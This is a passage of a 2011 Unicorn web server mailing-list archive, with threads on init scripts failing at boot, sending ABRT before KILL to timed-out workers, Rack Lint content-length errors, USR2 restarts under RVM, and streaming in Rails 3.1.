From: Eric Wong @ 2011-11-10 11:20 UTC (permalink / raw)
  To: unicorn list

Xavier Noria <fxn@hashref.com> wrote:
> Hey, I have this pretty standard init script for Unicorn
> 
>    http://pastie.org/2840779
> 
> where
> 
>    fxn@cohen:~$ ls -la /etc/init.d/unicorn_home
>    lrwxrwxrwx 1 root root 32 2011-11-09 23:45 /etc/init.d/unicorn_home
> -> /home/fxn/home/config/unicorn.sh
> 
>    fxn@cohen:~$ ls -la $HOME/.rvm/bin/ruby
>    -rwxrwxr-x 1 fxn sudo 265 2011-11-09 21:44 /home/fxn/.rvm/bin/ruby
> 
> and $APP_ROOT/bin/unicorn_rails is a binstub created by bundler.

Is /home mounted later in the boot process than when the
unicorn init script fires?  unicorn should be one of the last things
to start if you're putting it in init.

> The init script works like a charm if I run it with sudo, but for some
> reason the service is not launched if the machine is rebooted.
> 
> Do you know what could happen or how could I debug it? dmesg | grep
> unicorn prints nothing.

You could put the following near the top of the init script
(after "set -e"):

	# make sure the directory for this file is something that persists
	# throughout the boot process (isn't mounted-over by another dir):
	ERR=/var/tmp/unicorn.init.err
	rm -f "$ERR"
	exec 2>> "$ERR"

	# ... rest of the script

All stderr output (before unicorn is started) will then go to whatever
you set ERR to.  If you got all the way to starting unicorn:
does the stderr log of unicorn have anything interesting? (please
configure stderr_path if you haven't already)

You can also add "set -x" to the init script and things will get
very verbose once you set it.

Can't think of much else on my sleep-deprived brain...
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* Re: Sending ABRT to timeout-errant process before KILL
  2011-09-08  9:04  1% Sending ABRT to timeout-errant process before KILL J. Austin Hughey
@ 2011-09-08 19:13  5% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2011-09-08 19:13 UTC (permalink / raw)
  To: unicorn list; +Cc: J. Austin Hughey

"J. Austin Hughey" <jhughey@engineyard.com> wrote:
> The general idea is that I'd like to have some way to "warn" the
> application when it's about to be killed.  I've patched
> murder_lazy_workers to send an abort signal via kill_worker, sleep for
> 5 seconds, then look and see if the process still exists by using
> Process.getpgid.  If so, it sends the original kill command, and if
> not, a rescue block kicks in to prevent the raised error from
> Process.getpgid from making things explode.

The problem with anything other than SIGKILL (or SIGSTOP) is that it
assumes the Ruby VM is working and in a good state.

> I've created a simulation app, built on Rails 3.0, that uses a generic
> "posts" controller to simulate a long-running request.  Instead of
> just throwing a straight-up sleep 65 in there, I have it running
> through sleeping 1 second on a decrementing counter, and doing that 65
> times.  The reason is because, assuming I've read the code correctly,
> even with my "skip sleeping workers" commented line below, it'll skip
> over the process, thus rendering my simulation of a long-running
> process invalid.  However, clarification on this point is certainly
> welcome.  You can see the app here:
> https://github.com/jaustinhughey/unicorn_test/blob/master/app/controllers/posts_controller.rb

(purely for educational purposes, since I'll point you towards another
approach I believe is better)

              Signal.trap(:ABRT) do
                # Write some stuff to the Rails log
                logger.info "Caught Unicorn kill exception!"

If this is the logger that ships with Ruby, it locks a Mutex, so it'll
deadlock if another SIGABRT is received while logging the above
statement (a very small window, admittedly).

                # Do a controlled disconnect from ActiveRecord
                ActiveRecord::Base.connection.disconnect!

Likewise, if AR needs to lock internal structures before disconnecting,
it also must be reentrant.  Ruby's normal Mutex implementation is not
reentrant-safe.


> So it looks like Worker 1 is hitting a strange/false timeout of
> 1315467289 seconds, which isn't really possible as it wasn't even
> running 1315467289 seconds prior to that (which equates to roughly 41
> years ago if my math is right).

You're getting this because you removed the following line:

      0 == tick and next # skip workers that are sleeping

sleeping means they haven't accepted a client connection, yet.  Not
sleeping while processing a client request.   I'll clarify that in the
code.

> Needless to say, I'm a bit stumped at this point, and would sincerely
> appreciate another point of view on this.  Am I going about this all
> wrong?  Is there a better approach I should consider?  And if I'm on
> the right track, how can I get this to work regardless of how many
> Unicorn workers are running?

Since it's an application error, it can be done as middleware.  You can
try something like the Rainbows::ThreadTimeout middleware, it's
currently Rainbows! specific but can easily be made to work with
Unicorn.

	git clone git://bogomips.org/rainbows
	cat rainbows/lib/rainbows/thread_timeout.rb

This is conceptually similar to "timeout" in the Ruby standard library,
but does not allow nesting.

I'll try to clarify more later today if you have questions, in a bit of
a rush right now.

-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 5%]

* Sending ABRT to timeout-errant process before KILL
@ 2011-09-08  9:04  1% J. Austin Hughey
  2011-09-08 19:13  5% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: J. Austin Hughey @ 2011-09-08  9:04 UTC (permalink / raw)
  To: mongrel-unicorn

Hello there -

I've recently been working with a customer in my capacity as a support engineer at Engine Yard who's having some trouble with Unicorn.  Basically, they're finding their application being force-killed once it reaches the default timeout.  Rather than simply increasing the timeout, we're trying to find out _why_ their application is being killed.  Unfortunately we can't quite do that because the application is being force-killed without warning, making it so that the customer's logging can't actually be written to the disk. (This is an intermittent issue as opposed to something that happens 100% of the time.)

In discussing the matter internally and with our customer, I came up with a simple monkey patch to Unicorn that _sort of_ works, but I'm having some trouble with it once the number of Unicorn workers goes beyond one.  I originally limited it to just one worker because I wanted to limit the possibility that multiple workers could cause problems in figuring things out -- turns out I was right.

I'm going to show the patch in two ways: 1) inline, at the bottom of this post, and 2) by link to GitHub:
https://github.com/jaustinhughey/unicorn/blob/abort_prior_to_kill_workers/lib/unicorn/http_server.rb#L438

The general idea is that I'd like to have some way to "warn" the application when it's about to be killed.  I've patched murder_lazy_workers to send an abort signal via kill_worker, sleep for 5 seconds, then look and see if the process still exists by using Process.getpgid.  If so, it sends the original kill command, and if not, a rescue block kicks in to prevent the raised error from Process.getpgid from making things explode.

I've created a simulation app, built on Rails 3.0, that uses a generic "posts" controller to simulate a long-running request.  Instead of just throwing a straight-up sleep 65 in there, I have it running through sleeping 1 second on a decrementing counter, and doing that 65 times.  The reason is because, assuming I've read the code correctly, even with my "skip sleeping workers" commented line below, it'll skip over the process, thus rendering my simulation of a long-running process invalid.  However, clarification on this point is certainly welcome.  You can see the app here: https://github.com/jaustinhughey/unicorn_test/blob/master/app/controllers/posts_controller.rb

The problem I'm running into, and where I could use some help, is when I increase the number of Unicorn workers from one to two.  When running only one Unicorn worker, I can access my application's posts_controller's index action, which has the intentionally long-running code.  At that time I tail -f unicorn.log and production.log.  Those two logs look like this with one Unicorn worker:

WITH ONE UNICORN WORKER:
========================

production.log:
---------------
Sleeping 1 second (65 to go)…
 ... continued ...
Sleeping 1 second (7 to go)...
Sleeping 1 second (6 to go)...
Sleeping 1 second (5 to go)...
Caught Unicorn kill exception!
Sleeping 1 second (4 to go)...
Sleeping 1 second (3 to go)...
Sleeping 1 second (2 to go)...
Sleeping 1 second (1 to go)...
Completed 500 Internal Server Error in 65131ms

NoMethodError (undefined method `query_options' for nil:NilClass):
  app/controllers/posts_controller.rb:32:in `index'

(I think the NoMethodError issue above is due to me calling a disconnect on ActiveRecord in the Signal.trap block, so I think that can be safely ignored.)

As you can see, the Signal.trap block inside the aforementioned posts_controller is working in this case.  Corresponding log entries in unicorn.log concur:

unicorn.log:
------------
worker=0 ready
master process ready
[2011-09-08 00:31:01 PDT] worker=0 PID: 28921 timeout hit, sending ABRT to process 28921 then sleeping 5 seconds...
[2011-09-08 00:31:06 PDT] worker=0 PID:28921 timeout (61s > 60s), killing
reaped #<Process::Status: pid 28921 SIGKILL (signal 9)> worker=0
worker=0 ready

So with one worker, everything seems cool.  But with two workers?


WITH TWO UNICORN WORKERS:
=========================

production.log:
---------------
Sleeping 1 second (8 to go)...
Sleeping 1 second (7 to go)...
Sleeping 1 second (6 to go)...
Sleeping 1 second (5 to go)...
Sleeping 1 second (4 to go)...
Sleeping 1 second (3 to go)...
Sleeping 1 second (2 to go)...
Sleeping 1 second (1 to go)...
Rendered posts/index.html.erb within layouts/application (13.2ms)
Completed 200 OK in 65311ms (Views: 16.9ms | ActiveRecord: 0.5ms)

Note that there is no notice that the ABRT signal was trapped, nor is there a NoMethodError (likely caused by disconnecting from the database) as above.  Odd.

unicorn.log:
------------
Nothing.  No new data whatsoever.

The only potential clue I can see at this point would be a start-up message in unicorn.log.  After increasing the number of Unicorn workers to two, I examined unicorn.log again and found this:

master complete
I, [2011-09-08T00:34:40.499437 #29572]  INFO -- : unlinking existing socket=/var/run/engineyard/unicorn_ut.sock
I, [2011-09-08T00:34:40.499888 #29572]  INFO -- : listening on addr=/var/run/engineyard/unicorn_ut.sock fd=5
I, [2011-09-08T00:34:40.504542 #29572]  INFO -- : Refreshing Gem list
worker=0 ready
master process ready
[2011-09-08 00:34:49 PDT] worker=1 PID: 29582 timeout hit, sending ABRT to process 29582 then sleeping 5 seconds...
[2011-09-08 00:34:50 PDT] worker=1 PID:29582 timeout (1315467289s > 60s), killing
reaped #<Process::Status: pid 29582 SIGIOT (signal 6)> worker=1
worker=1 ready

So it looks like Worker 1 is hitting a strange/false timeout of 1315467289 seconds, which isn't really possible as it wasn't even running 1315467289 seconds prior to that (which equates to roughly 41 years ago if my math is right).

---

Needless to say, I'm a bit stumped at this point, and would sincerely appreciate another point of view on this.  Am I going about this all wrong?  Is there a better approach I should consider?  And if I'm on the right track, how can I get this to work regardless of how many Unicorn workers are running?

Thank you very much for any assistance you can provide!


-- INLINE VERSION OF PATCH --

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 78d80b4..8a2323f 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -429,6 +429,11 @@ class Unicorn::HttpServer
     proc_name 'master (old)'
   end
 
+  # A custom formatted timestamp for debugging
+  def custom_timestamp
+    return Time.now.strftime("[%Y-%m-%d %T %Z]")
+  end
+
   # forcibly terminate all workers that haven't checked in in timeout seconds.  The timeout is implemented using an unlinked File
   def murder_lazy_workers
     t = @timeout
@@ -436,16 +441,40 @@ class Unicorn::HttpServer
     now = Time.now.to_i
     WORKERS.dup.each_pair do |wpid, worker|
       tick = worker.tick
-      0 == tick and next # skip workers that are sleeping
+
+      # REMOVE THE FOLLOWING COMMENT WHEN TESTING PRODUCTION
+# 0 == tick and next # skip workers that are sleeping
+      # ^ needs to be active, commented here for simulation purposes
+
       diff = now - tick
       tmp = t - diff
       if tmp >= 0
         next_sleep < tmp and next_sleep = tmp
         next
       end
-      logger.error "worker=#{worker.nr} PID:#{wpid} timeout " \
-                   "(#{diff}s > #{t}s), killing"
-      kill_worker(:KILL, wpid) # take no prisoners for timeout violations
+
+
+      # Send an ABRT signal to Unicorn and wait 5 seconds before attempting an
+      # actual kill, if and only if the process is still running.
+
+      begin
+        # Send the ABRT signal.
+        logger.debug "#{custom_timestamp} worker=#{worker.nr} PID: #{wpid} timeout hit, sending ABRT to process #{wpid} then sleeping 5 seconds..."
+        kill_worker(:ABRT, wpid)
+
+        sleep 5
+
+        # Now see if the process still exists after being given five
+        # seconds to terminate on its own, and if so, do a hard kill.
+        if Process.getpgid(wpid)
+          logger.error "#{custom_timestamp} worker=#{worker.nr} PID:#{wpid} timeout " \
+                       "(#{diff}s > #{@timeout}s), killing"
+          kill_worker(:KILL, wpid) # take no prisoners for timeout violations
+        end
+      rescue Errno::ESRCH => e
+        # No process identified - maybe it exited on its own?
+        logger.debug "#{custom_timestamp} worker=#{worker.nr} PID: #{wpid} responded to ABRT on its own and no longer exists. (Received message: #{e})"
+      end
     end
     next_sleep
   end

-- END INLINE VERSION OF PATCH --

--
J. Austin Hughey
Application Support Engineer - Engine Yard
www.engineyard.com | jhughey@engineyard.com

_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply related	[relevance 1%]

* Re: Strange quit behavior
  @ 2011-08-23 16:49  4%                     ` Alex Sharp
  0 siblings, 0 replies; 200+ results
From: Alex Sharp @ 2011-08-23 16:49 UTC (permalink / raw)
  To: unicorn list

On Tuesday, August 23, 2011 at 12:12 AM, Eric Wong wrote:
> Did you send any signals to 18862 while you were making this strace?
Not while, no. I had already sent a USR2 signal to this process (the old master), and then I attached strace to it. 

I'll try sending another USR2 signal next time while strace is attached. 
> >  I went ahead and ran strace with the same flags on the *new* master,
> > and saw a bunch of output that looked bundler-related:
> > https://gist.github.com/138344b5b19ec6ba1a4c
> > 
> > Even more bizarre, eventually the process started successfully :-/ Is
> > it possible this had something to do with strace de-taching?
> 
> That looks like pretty normal "require" behavior. strace would slow
>  down requires, a lot.
> 
> So this was with preload_app=true? While you're debugging problems,
> I suggest keeping preload_app=false and worker_problems=1 to minimize
> the variables.
Ok, I'll change those and report back. I'm guessing you meant worker_processes (not problems)? 
> 
> > You can see this in the unicorn.stderr.log file I included in the
> > gist. Check out these two lines in particular, which occur 25 minutes
> >  apart:
> > 
> > I, [2011-08-23T02:15:08.396868 #22169] INFO -- : Refreshing Gem list
> > I, [2011-08-23T02:40:16.621210 #22925] INFO -- : worker=1 spawned pid=22925
> 
> Wow, it takes 25 minutes to load your application? strace makes the
>  application /much/ slower, so I can actually believe it takes that long.
No, my mistake. Loading the application only takes about 10 seconds, and I only had strace attached to this process for a few seconds (less than 10). My point here was to show that the new master just spun for a good 25 minutes (presumably trying to load files over and over again), and then, seemingly out of nowhere, the new master came up and spawned the new workers. 
Next time I'll try to get attached with strace earlier and record more output.

> 
>  Loading large applications is very slow under Ruby 1.9.2, there's some
> pathological load performance issues fixed in 1.9.3.
> 
Yep, I've read about those, and I've seen Xavier's patch, but I don't think that's the issue here (though, it appears that's why the files attempting to be loaded in the strace output do not exist). Under normal circumstances, loading the app takes about 10 seconds and doesn't peg the cpu while doing it.
> 
> So you're saying /without/ strace, CPU usage _stays_ at 100% and _never_
> goes down?
Correct. 
> 
> 
> Generally, can you reproduce this behavior on a plain (empty) Rails
>  application with no extra gems?
> 
Good idea, I'll try that next.

- Alex 
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 4%]

* Re: Rack content-length Rack::Lint::LintErrors errors with unicorn
  @ 2011-08-12 19:22  3%     ` Joe Van Dyk
  0 siblings, 0 replies; 200+ results
From: Joe Van Dyk @ 2011-08-12 19:22 UTC (permalink / raw)
  To: unicorn list

On Fri, Aug 12, 2011 at 11:09 AM, Joe Van Dyk <joe@tanga.com> wrote:
> On Thu, Aug 11, 2011 at 10:42 PM, Eric Wong <normalperson@yhbt.net> wrote:
>> Joe Van Dyk <joe@tanga.com> wrote:
>>> Has anyone seen anything like this before?  I can get it to happen all
>>> the time if I issue a HEAD request, but it only happens very
>>> intermittently on GET requests.
>>>
>>> I'm using Ruby 1.9.2p180.
>>>
>>> Any ideas on where to start debugging?
>>
>> What web framework and other middlewares are you running?  Are you using Rack::Head to
>> generate HEAD responses or something else?
>
> Rails 3.0.  I'm not doing anything special with HEAD requests.  I
> actually don't care about the HEAD requests -- you'll note that I'm
> doing a GET request below.  The Content-Length is 37902 (which is
> should be), but apparently there's nothing in the response body?


Here's another example, the body is apparently empty, but the
content-length is set on a 302 request.  Unfortunately, I can't
reproduce the problem consistently.  :(  I'd expect the body to not be
0 here.

216.14.95.14, 10.195.114.81 - - [12/Aug/2011 12:00:46] "GET
/deals/current/good_till_gone HTTP/1.0" 302 195 0.0148
app error: Content-Length header was 195, but should be 0
(Rack::Lint::LintError)
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/rack-1.2.3/lib/rack/lint.rb:19:in
`assert'
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/rack-1.2.3/lib/rack/lint.rb:501:in
`verify_content_length'
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/rack-1.2.3/lib/rack/lint.rb:525:in
`each'
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/unicorn-4.0.1/lib/unicorn/http_response.rb:41:in
`http_response_write'
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/unicorn-4.0.1/lib/unicorn/http_server.rb:526:in
`process_client'
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/unicorn-4.0.1/lib/unicorn/http_server.rb:585:in
`worker_loop'
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/newrelic_rpm-3.0.1/lib/new_relic/agent/instrumentation/unicorn_instrumentation.rb:12:in
`call'
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/newrelic_rpm-3.0.1/lib/new_relic/agent/instrumentation/unicorn_instrumentation.rb:12:in
`block (4 levels) in <top (required)>'
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/unicorn-4.0.1/lib/unicorn/http_server.rb:475:in
`spawn_missing_workers'
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/unicorn-4.0.1/lib/unicorn/http_server.rb:135:in
`start'
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/unicorn-4.0.1/bin/unicorn:121:in
`<top (required)>'
/data/tanga/current/sites/tanga/bin/unicorn:16:in `load'
/data/tanga/current/sites/tanga/bin/unicorn:16:in `<main>'


>
>>> 204.93.223.151, 10.195.114.81 - - [11/Aug/2011 21:03:50] "GET /
>>> HTTP/1.0" 200 37902 0.5316
>>> app error: Content-Length header was 37902, but should be 0
>>> (Rack::Lint::LintError)
>>> /mnt/data/tanga/current/bundler/ruby/1.9.1/gems/rack-1.2.3/lib/rack/lint.rb:19:in
>>> `assert'
>>> /mnt/data/tanga/current/bundler/ruby/1.9.1/gems/rack-1.2.3/lib/rack/lint.rb:501:in
>>> `verify_content_length'
>>
>> Looking at the 1.2.3 rack/lint.rb code, it should've set @head_request to true
>> when env["REQUEST_METHOD"] == "HEAD" (rack/lint.rb line 56).
>> Do you happen to have any middlewares that might rewrite REQUEST_METHOD?
>>
>> I would edit rack/lint.rb and put some print statements to show the
>> value of @head_request and env["REQUEST_METHOD"]
>>
>> --
>> Eric Wong
>> _______________________________________________
>> Unicorn mailing list - mongrel-unicorn@rubyforge.org
>> http://rubyforge.org/mailman/listinfo/mongrel-unicorn
>> Do not quote signatures (like this one) or top post when replying
>>
>
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: Strange quit behavior
  @ 2011-08-02 23:49  4%       ` Alex Sharp
  0 siblings, 0 replies; 200+ results
From: Alex Sharp @ 2011-08-02 23:49 UTC (permalink / raw)
  To: unicorn list; +Cc: James Cox

On Tue, Aug 2, 2011 at 4:08 PM, Eric Wong <normalperson@yhbt.net> wrote:
> James Cox <james@imaj.es> wrote:
>> So what should that look like? all but that nr-workers stuff? can i
>> just remove the before fork? and what would you say is a super good
>> unicorn config to start from?
>
> Yeah, skip the before_fork and also after_fork.  Those are mainly for
> disconnect/reconnect of ActiveRecord and anything else that might need a
> network connection.

FWIW, we use the before_fork hook to automatically kill the old master
by sending it QUIT:

before_fork do |server, worker|
  old_pid = '/var/www/api/shared/pids/unicorn.pid.oldbin'

  if File.exists?(old_pid) && server.pid != old_pid
    begin
      Process.kill("QUIT", File.read(old_pid).to_i)
    rescue Errno::ENOENT, Errno::ESRCH
      # another newly forked workers has already killed it
    end
  end
end

- alex
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 4%]

* Re: SIGTERM not actually killing processes
       [not found]         ` <CAFgS5CxwCmHL65W39R2W73YfUK34WX50DS_JJF4L-d_tQuH86Q@mail.gmail.com>
@ 2011-07-25 23:20  0%       ` Jesse Cooke
  0 siblings, 0 replies; 200+ results
From: Jesse Cooke @ 2011-07-25 23:20 UTC (permalink / raw)
  To: unicorn list

Sending TERM directly to the master process killed it.

--------------------------------------------
Jesse Cooke :: N-tier Engineer
jc00ke.com / @jc00ke


On Mon, Jul 25, 2011 at 3:30 PM, Jesse Cooke <jesse@jc00ke.com> wrote:
>
> Sending TERM directly to the master process killed it.
>
> --------------------------------------------
> Jesse Cooke :: N-tier Engineer
> jc00ke.com / @jc00ke
>
>
> On Mon, Jul 25, 2011 at 2:32 PM, Alex Sharp <ajsharp@gmail.com> wrote:
>>
>> On Monday, July 25, 2011 at 2:22 PM, Eric Wong wrote:
>>
>> Jesse Cooke <jesse@jc00ke.com> wrote:
>>
>> Hi,
>> Unicorn is saying it's terminating but it's not actually. Check out
>> the gist: https://gist.github.com/1104930
>>
>> Using:
>> - Ruby 1.9.2p180
>> - unicorn 4.0.1
>> - kgio 2.6.0
>> - bundler 1.0.15
>> - Linux maynard 2.6.38-10-generic #46-Ubuntu SMP Tue Jun 28 15:07:17
>> UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
>>
>> Please let me know if there's any other info I can provide.
>>
>> Since it's a 2.6.38 kernel, I it could be this bug:
>> https://bugzilla.kernel.org/show_bug.cgi?id=32922
>>
>> Linux 2.6.38.4 should have the fix, but I'm not sure if Ubuntu
>> backported that fix to its 2.6.38-10 package.
>>
>> Rubyists have seen this issue a few times already:
>> http://redmine.ruby-lang.org/issues/4777
>> http://redmine.ruby-lang.org/issues/4939
>>
>>
>> Also, can you try sending signals directly to Unicorn without foreman?
>> I'm not familiar with foreman at all, maybe somebody else on this list
>> is...
>>
>> Not familiar with foreman, but I've verified the issues you've linked to with another non-unicorn problem (god, actually). As of a couple of weeks ago, the kernel bug still existed in ubuntu 11.04, and to my knowledge, this is the only affected major version. We're in the process of moving to ubuntu 10.10 (mostly specifically because of this bug), which is the most recent LTS release, and not affected by the signal trapping bug.
>>
>> --
>> Eric Wong
>> _______________________________________________
>> Unicorn mailing list - mongrel-unicorn@rubyforge.org
>> http://rubyforge.org/mailman/listinfo/mongrel-unicorn
>> Do not quote signatures (like this one) or top post when replying
>>
>
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 0%]

* Re: Unicorn completely ignores USR2 signal
  2011-07-06 17:42  0% ` Eric Wong
@ 2011-07-07 23:02  0%   ` Ehud Rosenberg
  0 siblings, 0 replies; 200+ results
From: Ehud Rosenberg @ 2011-07-07 23:02 UTC (permalink / raw)
  To: mongrel-unicorn

Eric Wong <normalperson <at> yhbt.net> writes:

> 
> Ehud Rosenberg <ehudros <at> gmail.com> wrote:
> > Hi all,
> > I'm experiencing a rather strange problem with unicorn on my production 
server.
> > Although the config file states preload_app true, sending USR2 to the
> > master process does not generate any response, and it seems like
> > unicorn is ignoring the signal altogether.
> > On another server sending USR2 changes the master process to and (old)
> > state and starts a new master process successfully.
> > The problematic server is using RVM & bundler, so I'm assuming it's
> > somehow related (the other one is vanilla ruby).
> 
> RVM could be a problem, especially if your ENV changed somehow and your
> path to.  Can you dump out the START_CTX and ENV contents in the
> before_exec hook?
> 
>   before_exec do |server|
>     File.open("/tmp/start_ctx.dump", "ab") do |fp|
>       PP.pp Unicorn::HttpServer::START_CTX, fp
>       PP.pp ENV, fp
>     end
>   end
> 
> You may need to modify START_CTX if you're changing paths or if
> somehow RVM gave you the wrong path to unicorn
> 
> START_CTX is documented here:
>   http://unicorn.bogomips.org/Unicorn/HttpServer.html
> 
> > Sending signals other than USR2 (QUIT, HUP) works just fine.
> > Is there a way to trace what's going on behind the scenes here?
> 
> Run strace (Linux) or equivalent on the master process.
> 
> > Unicorn's log file is completely empty.
> 
> This is the log you setup to point to stderr_path?  That shouldn't
> happen...
> 

Sorry for not getting back to you guys earlier. 
It seems like the entire setup is somehow broken, as the before_exec block does 
not seem to output anything to the logfiles/temp file (I know how weird that 
sounds). The stdout/stderr logs do not contain any info other than the regular 
"worker started" message.
I've tried 'puts' outside of the before_exec block and got the following output 
straight into my stdout (right after running sudo /etc/init.d/unicorn start):
{:argv=>["-D", "-E", "production", "-c", 
"/var/www/platform/current/config/unicorn.rb"], 0=>"/usr/local/rvm/gems/ruby-
1.9.2-head/bin/unicorn", :cwd=>"/var/www/platform/current"}

{"OLDPWD"=>"/var/www/platform/current", "SUDO_UID"=>"1000", "LOGNAME"=>"root", 
"USERNAME"=>"root", "PATH"=>"/usr/local/rvm/gems/ruby-1.9.2-
head/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/X11R6
/bin", "SHELL"=>"/bin/bash", "GEM_HOME"=>"/usr/local/rvm/gems/ruby-1.9.2-head",  
"PWD"=>"/var/www/platform/current", "RACK_ENV"=>"production", 
"BUNDLE_GEMFILE"=>"/var/www/platform/current/Gemfile", 
"BUNDLE_BIN_PATH"=>"/usr/local/rvm/gems/ruby-1.9.2-head/gems/bundler-
1.0.10/bin/bundle", "RUBYOPT"=>"-I/usr/local/rvm/gems/ruby-1.9.2-
head/gems/bundler-1.0.10/lib -rbundler/setup"}

The ENV output was truncated a little to remove irrelevant keys.

strace can be found here: 
https://gist.github.com/54cd784880b99a2b46d5/77718daec3c08227639a0619e02d387c4d0
cd9fd
I couldn't really figure out what's going on there - it complains the pid file 
can't be found although it's there, and it then writes its content to the oldbin 
file (which is never actually created in the pid directory). Permissions wise 
the directory is writable by pretty much anyone, and unicorn runs as root 
anyway.

The server is Ubuntu 10.04, ruby 1.9.2p53.
The server starts fine and the site is fully functional despite all the 
weirdness :)



_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 0%]

* Re: Unicorn completely ignores USR2 signal
  2011-07-06 10:21  4% Unicorn completely ignores USR2 signal Ehud Rosenberg
@ 2011-07-06 17:42  0% ` Eric Wong
  2011-07-07 23:02  0%   ` Ehud Rosenberg
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2011-07-06 17:42 UTC (permalink / raw)
  To: unicorn list

Ehud Rosenberg <ehudros@gmail.com> wrote:
> Hi all,
> I'm experiencing a rather strange problem with unicorn on my production server.
> Although the config file states preload_app true, sending USR2 to the
> master process does not generate any response, and it seems like
> unicorn is ignoring the signal altogether.
> On another server sending USR2 changes the master process to and (old)
> state and starts a new master process successfully.
> The problematic server is using RVM & bundler, so I'm assuming it's
> somehow related (the other one is vanilla ruby).

RVM could be a problem, especially if your ENV changed somehow and your
path to.  Can you dump out the START_CTX and ENV contents in the
before_exec hook?

  before_exec do |server|
    File.open("/tmp/start_ctx.dump", "ab") do |fp|
      PP.pp Unicorn::HttpServer::START_CTX, fp
      PP.pp ENV, fp
    end
  end

You may need to modify START_CTX if you're changing paths or if
somehow RVM gave you the wrong path to unicorn

START_CTX is documented here:
  http://unicorn.bogomips.org/Unicorn/HttpServer.html

> Sending signals other than USR2 (QUIT, HUP) works just fine.
> Is there a way to trace what's going on behind the scenes here?

Run strace (Linux) or equivalent on the master process.

> Unicorn's log file is completely empty.

This is the log you setup to point to stderr_path?  That shouldn't
happen...

-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 0%]

* Unicorn completely ignores USR2 signal
@ 2011-07-06 10:21  4% Ehud Rosenberg
  2011-07-06 17:42  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Ehud Rosenberg @ 2011-07-06 10:21 UTC (permalink / raw)
  To: mongrel-unicorn

Hi all,
I'm experiencing a rather strange problem with unicorn on my production server.
Although the config file states preload_app true, sending USR2 to the
master process does not generate any response, and it seems like
unicorn is ignoring the signal altogether.
On another server sending USR2 changes the master process to and (old)
state and starts a new master process successfully.
The problematic server is using RVM & bundler, so I'm assuming it's
somehow related (the other one is vanilla ruby).
Sending signals other than USR2 (QUIT, HUP) works just fine.
Is there a way to trace what's going on behind the scenes here?
Unicorn's log file is completely empty.
Thanks :)
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying


^ permalink raw reply	[relevance 4%]

* Re: Unicorn and streaming in Rails 3.1
  2011-06-25 20:16  5% ` Eric Wong
@ 2011-06-25 22:23  0%   ` Xavier Noria
  0 siblings, 0 replies; 200+ results
From: Xavier Noria @ 2011-06-25 22:23 UTC (permalink / raw)
  To: unicorn list

On Sat, Jun 25, 2011 at 10:16 PM, Eric Wong <normalperson@yhbt.net> wrote:

> Basically the per-connection overhead of Unicorn is huge, an entire Ruby
> process (tens to several hundreds of megabytes).  The per-connection
> overhead of nginx is tiny: maybe a few KB in userspace (including
> buffers), and a few KB in in the kernel.  You don't want to maintain
> connections to Unicorn for a long time because of that cost.

I see. I've read also the docs about design and philosophy in the website.

So if I understand it correctly, as far as memory consumption is
concerned the situation seems to be similar to the old days when
mongrel cluster was the standard for production, except perhaps for
setups with copy-on-write friendly interpreters, which weren't
available then.

So you configure only a few processes because of memory consumption,
and since there aren't many you want them to be ready to serve a new
request as soon as possible to handle some normal level of
concurrency. Hence the convenience of buffering in Nginx.

>> in the use case we have in mind in
>> Rails 3.1, which is to serve HEAD as soon as possible.
>
> Small nit: s/HEAD/the response header/   "HEAD" is a /request/ that only
> expects to receive the response header.

Oh yes, that was ambiguous. I actually meant the HEAD element of HTML
documents. The main use case in mind for adding streaming to Rails is
to be able to send the top of your layout (typically everything before
yielding to the view) so that the browser may issue requests for CSS
